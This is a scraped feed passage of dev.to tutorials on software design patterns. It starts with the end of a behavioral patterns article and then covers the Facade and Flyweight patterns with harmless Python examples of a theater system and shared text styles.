<td>Medium</td> <td>Undo/redo, queuing, logging</td> </tr> <tr> <td>State</td> <td>Change behavior based on internal state</td> <td>Medium</td> <td>State machines, workflows</td> </tr> <tr> <td>Template Method</td> <td>Define algorithm structure in base class</td> <td>Low</td> <td>Similar algorithms with different steps</td> </tr> <tr> <td>Chain of Resp.</td> <td>Pass requests through handler chain</td> <td>Medium</td> <td>Escalation, filtering, middleware</td> </tr> <tr> <td>Iterator</td> <td>Traverse collections</td> <td>Low</td> <td>Custom collections</td> </tr> <tr> <td>Mediator</td> <td>Coordinate object interactions</td> <td>Medium</td> <td>Complex communication</td> </tr> <tr> <td>Memento</td> <td>Save and restore state</td> <td>Medium</td> <td>Snapshots, rollback</td> </tr> <tr> <td>Visitor</td> <td>Add operations to objects</td> <td>High</td> <td>ASTs, reporting</td> </tr> <tr> <td>Interpreter</td> <td>Define and evaluate grammar</td> <td>High</td> <td>DSLs, rule engines</td> </tr> </tbody> </table></div> <h2> Key Takeaways </h2> <ol> <li> <strong>Strategy</strong> — Choose behavior dynamically</li> <li> <strong>Observer</strong> — React to state changes automatically</li> <li> <strong>Command</strong> — Encapsulate and queue requests</li> <li> <strong>State</strong> — Manage complex state transitions clearly</li> <li> <strong>Template Method</strong> — Share algorithm structure, differ in details</li> <li> <strong>Chain of Responsibility</strong> — Escalate through handlers</li> <li> <strong>Iterator</strong> — Traverse collections consistently</li> <li> <strong>Mediator</strong> — Centralize communication</li> <li> <strong>Memento</strong> — Save and restore state</li> <li> <strong>Visitor</strong> — Add operations without modifying classes</li> <li> <strong>Interpreter</strong> — Build and evaluate custom rules</li> </ol> <p><strong>The Golden Rule of Behavioral Patterns:</strong></p> <blockquote> <p><strong>Make object interaction explicit. Don't hide behavior in conditionals.</strong></p> </blockquote> <p>When you find yourself writing giant if-elif chains or scattered event handling, a behavioral pattern is probably the answer.</p> <h2> Design Patterns Complete Series </h2> <ol> <li> <strong><a href="https://dev.to/mahdi0shamlou/design-patterns-in-programming-stop-building-spaghetti-code-2026-edition-7jd">Creational Patterns</a></strong> — How to create objects properly</li> <li> <strong><a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-structural-design-patterns-2026-adapter-bridge-composite-decorator--1f1c">Structural Patterns - Part 1</a></strong> — Adapter, Bridge, Composite, Decorator</li> <li> <strong><a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-structural-design-patterns-2026-facade-flyweight-proxy-production-examples-g5l">Structural Patterns - Part 2</a></strong> — Facade, Flyweight, Proxy</li> <li> <strong><a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-behavioral-design-patterns-2026-strategy-observer-command-state-more--3k36">Behavioral Patterns</a></strong> (This Article) — How objects communicate</li> </ol> <h2> Want More Deep Dives? </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foma76yifzlt37jfwale7.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foma76yifzlt37jfwale7.webp" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>If you enjoyed this article, check out my other production-focused guides:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8">Message Brokers in 2026: Kafka, RabbitMQ, NATS</a> — Architecture decisions</li> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition)</a> — Security patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">Injection Attacks Are Not Dead</a> — Attack patterns and solutions</li> <li> <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">Durable Workflow Engines: Temporal vs dbt OS</a> — System patterns</li> </ul> <p>🔗 <strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 <strong>Telegram:</strong> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 <strong>Instagram:</strong> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p><strong>Author: Mahdi Shamlou | مهدی شاملو</strong></p> ai webdev programming tutorial Mahdi Shamlou | Structural Design Patterns 2026: Facade, Flyweight, Proxy — Production Examples Mahdi SHamlou | مهدی شاملو Sun, 14 Jun 2026 19:32:48 +0000 https://dev.to/mahdi0shamlou/mahdi-shamlou-structural-design-patterns-2026-facade-flyweight-proxy-production-examples-g5l https://dev.to/mahdi0shamlou/mahdi-shamlou-structural-design-patterns-2026-facade-flyweight-proxy-production-examples-g5l <p><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here.</p> <p>Welcome back to the <strong>Structural Design Patterns</strong> series.</p> <p>In <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-structural-design-patterns-2026-adapter-bridge-composite-decorator--1f1c">Part 1</a>, we explored:</p> <ul> <li> <strong>Adapter</strong> — Making incompatible systems work together</li> <li> <strong>Bridge</strong> — Decoupling abstraction from implementation</li> <li> <strong>Composite</strong> — Building tree structures elegantly</li> <li> <strong>Decorator</strong> — Adding behavior without modification</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkgge2hpi4hzysuvbfwqw.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkgge2hpi4hzysuvbfwqw.png" alt="Mahdi Shamlou" width="800" height="450"></a></p> <p>Now it's time for the final three structural patterns that will complete your arsenal.</p> <p>These patterns solve different but equally important problems:</p> <ul> <li>Simplifying complex systems (<strong>Facade</strong>)</li> <li>Saving memory with shared objects (<strong>Flyweight</strong>)</li> <li>Controlling access to objects (<strong>Proxy</strong>)</li> </ul> <p>Let's dive into the code.</p> <h2> Part 2: The Final Structural Patterns </h2> <h3> 5. Facade Pattern </h3> <p>The Facade pattern provides a unified, simplified interface to a set of interfaces in a subsystem.</p> <p>It's about hiding complexity behind a simple interface.</p> <p>Imagine using a movie theater. Behind the scenes:</p> <ul> <li>The lights need to dim</li> <li>The sound system needs to adjust</li> <li>The projector needs to start</li> <li>The curtains need to open</li> <li>The audience needs to settle</li> </ul> <p>Without Facade, the client would interact with all these systems directly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">lights</span><span class="p">.</span><span class="nf">dim</span><span class="p">()</span> <span class="n">sound_system</span><span class="p">.</span><span class="nf">set_volume</span><span class="p">(</span><span class="mi">50</span><span class="p">)</span> <span class="n">projector</span><span class="p">.</span><span class="nf">start</span><span class="p">()</span> <span class="n">curtains</span><span class="p">.</span><span class="nf">open</span><span class="p">()</span> </code></pre> </div> <p>With Facade, the client just calls:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">theater</span><span class="p">.</span><span class="nf">watch_movie</span><span class="p">()</span> </code></pre> </div> <p><strong>When to use it:</strong></p> <ul> <li>Simplifying complex subsystems</li> <li>Decoupling clients from subsystem components</li> <li>Creating a simple entry point to a complex system</li> <li>Legacy system integration</li> <li>Providing a versioning layer</li> <li>API simplification</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Complex subsystem with many classes </span><span class="k">class</span> <span class="nc">Lights</span><span class="p">:</span> <span class="k">def</span> <span class="nf">dim</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">percentage</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Lights dimmed to </span><span class="si">{</span><span class="n">percentage</span><span class="si">}</span><span class="s">%</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">SoundSystem</span><span class="p">:</span> <span class="k">def</span> <span class="nf">set_volume</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">level</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Volume set to </span><span class="si">{</span><span class="n">level</span><span class="si">}</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">enable_surround</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Surround sound enabled</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">Projector</span><span class="p">:</span> <span class="k">def</span> <span class="nf">turn_on</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Projector is on</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">set_resolution</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">resolution</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Resolution set to </span><span class="si">{</span><span class="n">resolution</span><span class="si">}</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">Curtains</span><span class="p">:</span> <span class="k">def</span> <span class="nf">open</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Curtains opening</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">close</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Curtains closing</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">PopcornMachine</span><span class="p">:</span> <span class="k">def</span> <span class="nf">start</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Popcorn machine started</span><span class="sh">"</span> <span class="c1"># Client needs to know about all these systems </span><span class="k">def</span> <span class="nf">watch_movie</span><span class="p">():</span> <span class="n">lights</span> <span class="o">=</span> <span class="nc">Lights</span><span class="p">()</span> <span class="n">sound</span> <span class="o">=</span> <span class="nc">SoundSystem</span><span class="p">()</span> <span class="n">projector</span> <span class="o">=</span> <span class="nc">Projector</span><span class="p">()</span> <span class="n">curtains</span> <span class="o">=</span> <span class="nc">Curtains</span><span class="p">()</span> <span class="n">popcorn</span> <span class="o">=</span> <span class="nc">PopcornMachine</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">lights</span><span class="p">.</span><span class="nf">dim</span><span class="p">(</span><span class="mi">30</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">sound</span><span class="p">.</span><span class="nf">set_volume</span><span class="p">(</span><span class="mi">70</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">sound</span><span class="p">.</span><span class="nf">enable_surround</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="n">projector</span><span class="p">.</span><span class="nf">turn_on</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="n">projector</span><span class="p">.</span><span class="nf">set_resolution</span><span class="p">(</span><span class="sh">"</span><span class="s">4K</span><span class="sh">"</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">curtains</span><span class="p">.</span><span class="nf">open</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="n">popcorn</span><span class="p">.</span><span class="nf">start</span><span class="p">())</span> <span class="c1"># 7 steps for a simple action! </span> <span class="nf">watch_movie</span><span class="p">()</span> </code></pre> </div> <p>The problem: Too many details. The client needs to understand the entire theater system.</p> <h3> Good code (with Facade) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Keep the complex subsystem (same as before) </span><span class="k">class</span> <span class="nc">Lights</span><span class="p">:</span> <span class="k">def</span> <span class="nf">dim</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">percentage</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Lights dimmed to </span><span class="si">{</span><span class="n">percentage</span><span class="si">}</span><span class="s">%</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">SoundSystem</span><span class="p">:</span> <span class="k">def</span> <span class="nf">set_volume</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">level</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Volume set to </span><span class="si">{</span><span class="n">level</span><span class="si">}</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">enable_surround</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Surround sound enabled</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">Projector</span><span class="p">:</span> <span class="k">def</span> <span class="nf">turn_on</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Projector is on</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">set_resolution</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">resolution</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Resolution set to </span><span class="si">{</span><span class="n">resolution</span><span class="si">}</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">Curtains</span><span class="p">:</span> <span class="k">def</span> <span class="nf">open</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Curtains opening</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">PopcornMachine</span><span class="p">:</span> <span class="k">def</span> <span class="nf">start</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Popcorn machine started</span><span class="sh">"</span> <span class="c1"># Facade: Single entry point </span><span class="k">class</span> <span class="nc">TheaterFacade</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">lights</span> <span class="o">=</span> <span class="nc">Lights</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="n">sound</span> <span class="o">=</span> <span class="nc">SoundSystem</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="n">projector</span> <span class="o">=</span> <span class="nc">Projector</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="n">curtains</span> <span class="o">=</span> <span class="nc">Curtains</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="n">popcorn</span> <span class="o">=</span> <span class="nc">PopcornMachine</span><span class="p">()</span> <span class="k">def</span> <span class="nf">watch_movie</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Simple interface hides complexity</span><span class="sh">"""</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">lights</span><span class="p">.</span><span class="nf">dim</span><span class="p">(</span><span class="mi">30</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">sound</span><span class="p">.</span><span class="nf">set_volume</span><span class="p">(</span><span class="mi">70</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">sound</span><span class="p">.</span><span class="nf">enable_surround</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">projector</span><span class="p">.</span><span class="nf">turn_on</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">projector</span><span class="p">.</span><span class="nf">set_resolution</span><span class="p">(</span><span class="sh">"</span><span class="s">4K</span><span class="sh">"</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">curtains</span><span class="p">.</span><span class="nf">open</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">popcorn</span><span class="p">.</span><span class="nf">start</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">🎬 Movie starting!</span><span class="se">\n</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">end_movie</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Cleanup is also simplified</span><span class="sh">"""</span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">curtains</span><span class="p">.</span><span class="nf">open</span><span class="p">())</span> <span class="c1"># Actually should close, but you get the idea </span> <span class="nf">print</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">lights</span><span class="p">.</span><span class="nf">dim</span><span class="p">(</span><span class="mi">100</span><span class="p">))</span> <span class="c1"># Lights back to normal </span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Theater ready for next showing</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Client code is simple </span><span class="n">theater</span> <span class="o">=</span> <span class="nc">TheaterFacade</span><span class="p">()</span> <span class="n">theater</span><span class="p">.</span><span class="nf">watch_movie</span><span class="p">()</span> <span class="n">theater</span><span class="p">.</span><span class="nf">end_movie</span><span class="p">()</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Simplifies client code dramatically</li> <li>Decouples clients from subsystem details</li> <li>Makes the system easier to use</li> <li>Can provide different facades for different needs</li> <li>Good for versioning and API design</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Facade can become a "god object" if it does too much</li> <li>Clients lose fine-grained control</li> <li>Can hide important details when you need them</li> <li>Adds another layer of indirection</li> </ul> <p><strong>My Take:</strong></p> <p>Facade is one of the most practical patterns in the real world.</p> <p>Every well-designed library, framework, and API uses Facade principles. Flask, Django, FastAPI—they all provide simple interfaces on top of complex systems.</p> <p>If your subsystem is growing complex and forcing clients to understand many classes, Facade is the answer.</p> <p>But don't overuse it. <strong>One Facade is good. Ten Facades means your architecture is messy.</strong></p> <h3> 6. Flyweight Pattern </h3> <p>The Flyweight pattern uses sharing to support large numbers of fine-grained objects efficiently.</p> <p>When you have thousands (or millions) of similar objects, you can't afford to create each one from scratch.</p> <p>Flyweight extracts the <strong>shared, immutable data</strong> (intrinsic state) from the <strong>unique, changeable data</strong> (extrinsic state).</p> <p>Classic example: A text editor with millions of characters.</p> <p>Each character has:</p> <ul> <li> <strong>Intrinsic state</strong> (never changes): Font family, size, style</li> <li> <strong>Extrinsic state</strong> (changes): Position, color for this specific instance</li> </ul> <p>Instead of storing both in each character object, flyweight stores intrinsic state once and shares it.</p> <p><strong>When to use it:</strong></p> <ul> <li>Managing large numbers of similar objects</li> <li>Memory optimization is critical</li> <li>Game development (particles, trees, NPCs)</li> <li>Text editors with millions of characters</li> <li>Caches and object pools</li> <li>UI rendering of repeated elements</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Without Flyweight, each character object stores everything </span><span class="k">class</span> <span class="nc">Character</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">char</span><span class="p">,</span> <span class="n">font</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">color</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">char</span> <span class="o">=</span> <span class="n">char</span> <span class="n">self</span><span class="p">.</span><span class="n">font</span> <span class="o">=</span> <span class="n">font</span> <span class="c1"># Repeated thousands of times </span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span> <span class="c1"># Repeated thousands of times </span> <span class="n">self</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">color</span> <span class="c1"># Same for all red text </span> <span class="n">self</span><span class="p">.</span><span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="c1"># Unique per character </span> <span class="n">self</span><span class="p">.</span><span class="n">y</span> <span class="o">=</span> <span class="n">y</span> <span class="c1"># Unique per character </span> <span class="c1"># Creating a document with 100,000 characters </span><span class="n">document</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">100000</span><span class="p">):</span> <span class="c1"># Each character duplicates font and size information </span> <span class="n">char</span> <span class="o">=</span> <span class="nc">Character</span><span class="p">(</span> <span class="nf">chr</span><span class="p">(</span><span class="nf">ord</span><span class="p">(</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">26</span><span class="p">)),</span> <span class="n">font</span><span class="o">=</span><span class="sh">"</span><span class="s">Arial</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Repeated 100,000 times! </span> <span class="n">size</span><span class="o">=</span><span class="mi">12</span><span class="p">,</span> <span class="c1"># Repeated 100,000 times! </span> <span class="n">color</span><span class="o">=</span><span class="sh">"</span><span class="s">black</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># Repeated 100,000 times! </span> <span class="n">x</span><span class="o">=</span><span class="n">i</span> <span class="o">%</span> <span class="mi">100</span><span class="p">,</span> <span class="n">y</span><span class="o">=</span><span class="n">i</span> <span class="o">//</span> <span class="mi">100</span> <span class="p">)</span> <span class="n">document</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="c1"># Memory usage: Massive waste from duplication </span></code></pre> </div> <p>The problem: Redundant data stored in every object.</p> <h3> Good code (with Flyweight) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Intrinsic state: Shared and immutable </span><span class="k">class</span> <span class="nc">CharacterStyle</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">font</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">color</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">font</span> <span class="o">=</span> <span class="n">font</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span> <span class="n">self</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">color</span> <span class="k">def</span> <span class="nf">__eq__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">other</span><span class="p">):</span> <span class="nf">return </span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">font</span> <span class="o">==</span> <span class="n">other</span><span class="p">.</span><span class="n">font</span> <span class="ow">and</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">==</span> <span class="n">other</span><span class="p">.</span><span class="n">size</span> <span class="ow">and</span> <span class="n">self</span><span class="p">.</span><span class="n">color</span> <span class="o">==</span> <span class="n">other</span><span class="p">.</span><span class="n">color</span><span class="p">)</span> <span class="k">def</span> <span class="nf">__hash__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">hash</span><span class="p">((</span><span class="n">self</span><span class="p">.</span><span class="n">font</span><span class="p">,</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span><span class="p">,</span> <span class="n">self</span><span class="p">.</span><span class="n">color</span><span class="p">))</span> <span class="c1"># Flyweight Factory: Ensures only one instance per unique intrinsic state </span><span class="k">class</span> <span class="nc">StyleFactory</span><span class="p">:</span> <span class="n">_styles</span> <span class="o">=</span> <span class="p">{}</span> <span class="nd">@staticmethod</span> <span class="k">def</span> <span class="nf">get_style</span><span class="p">(</span><span class="n">font</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">color</span><span class="p">):</span> <span class="n">style</span> <span class="o">=</span> <span class="nc">CharacterStyle</span><span class="p">(</span><span class="n">font</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">color</span><span class="p">)</span> <span class="c1"># Return existing style if we've seen it before </span> <span class="k">if</span> <span class="n">style</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">StyleFactory</span><span class="p">.</span><span class="n">_styles</span><span class="p">:</span> <span class="n">StyleFactory</span><span class="p">.</span><span class="n">_styles</span><span class="p">[</span><span class="n">style</span><span class="p">]</span> <span class="o">=</span> <span class="n">style</span> <span class="k">return</span> <span class="n">StyleFactory</span><span class="p">.</span><span class="n">_styles</span><span class="p">[</span><span class="n">style</span><span class="p">]</span> <span class="c1"># Extrinsic state: Unique per instance </span><span class="k">class</span> <span class="nc">Character</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">char</span><span class="p">,</span> <span class="n">style</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">char</span> <span class="o">=</span> <span class="n">char</span> <span class="n">self</span><span class="p">.</span><span class="n">style</span> <span class="o">=</span> <span class="n">style</span> <span class="c1"># Shared reference </span> <span class="n">self</span><span class="p">.</span><span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="c1"># Unique </span> <span class="n">self</span><span class="p">.</span><span class="n">y</span> <span class="o">=</span> <span class="n">y</span> <span class="c1"># Unique </span> <span class="k">def</span> <span class="nf">render</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">char</span><span class="si">}</span><span class="s"> at (</span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">x</span><span class="si">}</span><span class="s">, </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">y</span><span class="si">}</span><span class="s">) in </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">style</span><span class="p">.</span><span class="n">font</span><span class="si">}</span><span class="sh">"</span> <span class="c1"># Client code </span><span class="n">document</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">style_factory</span> <span class="o">=</span> <span class="nc">StyleFactory</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">100000</span><span class="p">):</span> <span class="c1"># All characters share the same Arial/12/black style </span> <span class="n">style</span> <span class="o">=</span> <span class="n">style_factory</span><span class="p">.</span><span class="nf">get_style</span><span class="p">(</span><span class="sh">"</span><span class="s">Arial</span><span class="sh">"</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="sh">"</span><span class="s">black</span><span class="sh">"</span><span class="p">)</span> <span class="n">char</span> <span class="o">=</span> <span class="nc">Character</span><span class="p">(</span> <span class="nf">chr</span><span class="p">(</span><span class="nf">ord</span><span class="p">(</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">26</span><span class="p">)),</span> <span class="n">style</span><span class="p">,</span> <span class="c1"># Shared, not duplicated </span> <span class="n">x</span><span class="o">=</span><span class="n">i</span> <span class="o">%</span> <span class="mi">100</span><span class="p">,</span> <span class="n">y</span><span class="o">=</span><span class="n">i</span> <span class="o">//</span> <span class="mi">100</span> <span class="p">)</span> <span class="n">document</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="c1"># Check memory efficiency </span><span class="n">arial_12_black</span> <span class="o">=</span> <span class="n">style_factory</span><span class="p">.</span><span class="nf">get_style</span><span class="p">(</span><span class="sh">"</span><span class="s">Arial</span><span class="sh">"</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="sh">"</span><span class="s">black</span><span class="sh">"</span><span class="p">)</span> <span class="n">arial_12_blue</span> <span class="o">=</span> <span class="n">style_factory</span><span class="p">.</span><span class="nf">get_style</span><span class="p">(</span><span class="sh">"</span><span class="s">Arial</span><span class="sh">"</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="sh">"</span><span class="s">blue</span><span class="sh">"</span><span class="p">)</span> <span class="n">arial_12_black_again</span> <span class="o">=</span> <span class="n">style_factory</span><span class="p">.</span><span class="nf">get_style</span><span class="p">(</span><span class="sh">"</span><span class="s">Arial</span><span class="sh">"</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="sh">"</span><span class="s">black</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">arial_12_black</span> <span class="ow">is</span> <span class="n">arial_12_black_again</span><span class="p">)</span> <span class="c1"># True - same object in memory </span><span class="nf">print</span><span class="p">(</span><span class="n">arial_12_black</span> <span class="ow">is</span> <span class="n">arial_12_blue</span><span class="p">)</span> <span class="c1"># False - different style </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Dramatically reduces memory usage for many similar objects</li> <li>Improves performance through object sharing</li> <li>Single source of truth for shared data</li> <li>Works well with object pooling</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Added complexity with intrinsic/extrinsic separation</li> <li>Thread safety considerations for factories</li> <li>Debugging can be trickier with shared objects</li> <li>Only valuable for large-scale scenarios</li> </ul> 